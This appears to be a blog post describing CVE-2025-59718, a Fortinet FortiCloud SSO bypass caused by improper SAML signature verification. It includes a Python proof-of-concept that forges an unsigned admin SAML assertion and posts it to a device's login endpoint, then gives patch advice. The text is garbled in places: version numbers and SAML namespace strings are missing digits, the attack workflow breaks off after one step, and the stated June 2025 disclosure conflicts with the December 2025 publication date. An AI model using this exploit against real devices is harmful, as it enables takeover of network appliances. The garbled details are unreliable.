CVE-2025-59718 - How Hackers Can Bypass Fortinet FortiCloud Login – Deep Dive & Proof of Concept

In June 2025, a serious vulnerability was disclosed in several Fortinet products. Known as CVE-2025-59718, this flaw allows unauthenticated attackers to bypass the FortiCloud Single Sign-On (SSO) login process. If you run FortiOS, FortiProxy, or FortiSwitchManager, this is urgent news. Below, I’ll break down how the bug works, how attackers can exploit it, and what you can do to stay safe.

FortiSwitchManager: 7.2.–7.2.6, 7..–7..5

- Impact: Allows an unauthenticated attacker to bypass FortiCloud SSO authentication by exploiting improper cryptographic signature verification in SAML response handling.
- CVSS Score: To be announced (expected High/Critical)

References:

- Fortinet PSIRT Advisory (official)
- NVD CVE-2025-59718 page

How the Attack Works

Fortinet devices use SAML (Security Assertion Markup Language) for SSO, which passes authentication tokens between FortiCloud and the device. These tokens use *digital signatures* to make sure the response is legit.

However, due to improper verification of the SAML signature, the device might accept a fake (forged) SAML response—even when it’s from the attacker, not from FortiCloud.

Attack Workflow

1. Victim visits the FortiOS/Proxy/SwitchManager login via SSO.

Sample Exploit Code

Here’s a simplified Python snippet showing the attack’s core logic. This code forges a SAML Response and submits it to the login endpoint. (For educational purposes only!)

import requests
import base64
from xml.etree.ElementTree import Element, tostring

# Craft fake SAML response (no real signature)
def create_forged_saml():
    root = Element('samlp:Response', {
        'xmlns:samlp': 'urn:oasis:names:tc:SAML:2.:protocol',
        'ID': 'evil-id',
        'Version': '2.',
        'IssueInstant': '2025-06-10T00:00:00Z'
    })
    # Insert bogus assertion indicating admin access
    assertion = Element('saml:Assertion', {'xmlns:saml': 'urn:oasis:names:tc:SAML:2.:assertion'})
    subject = Element('saml:Subject')
    nameid = Element('saml:NameID')
    nameid.text = "admin@target.com"
    subject.append(nameid)
    assertion.append(subject)
    root.append(assertion)
    # No <ds:Signature> tag!
    return base64.b64encode(tostring(root)).decode()

# Target FortiOS SSO endpoint
TARGET_URL = 'https://fortidevice.example.com/remote/saml/login';

# Submit forged SAML
saml = create_forged_saml()
r = requests.post(TARGET_URL, data={"SAMLResponse": saml})
print(f"Status: {r.status_code}, Content: {r.text[:200]}")

Real-World Dangers

If someone can reach the SSO endpoint (for example, through the internet or your internal network), they can become an admin on your network appliance in seconds. This not only exposes your device but potentially the entire network it protects.

Patch immediately

- Upgrade to fixed versions of FortiOS, FortiProxy, and FortiSwitchManager as soon as they are available. Check Fortinet’s advisory page for patch releases.

References & Additional Reading

- Fortinet PSIRT Advisory
- National Vulnerability Database: CVE-2025-59718
- Understanding SAML Security

Summary

CVE-2025-59718 is a critical flaw affecting many Fortinet products. It makes it possible for attackers to skip authentication and take over devices using a simple, crafted SAML message.

Patch now and protect your Fortinet devices before attackers do.

*This information is provided for educational purposes only. Do not attempt to exploit systems without explicit authorization.*

Timeline

Published on: 12/09/2025 17:20:11 UTC
Last modified on: 01/14/2026 09:18:16 UTC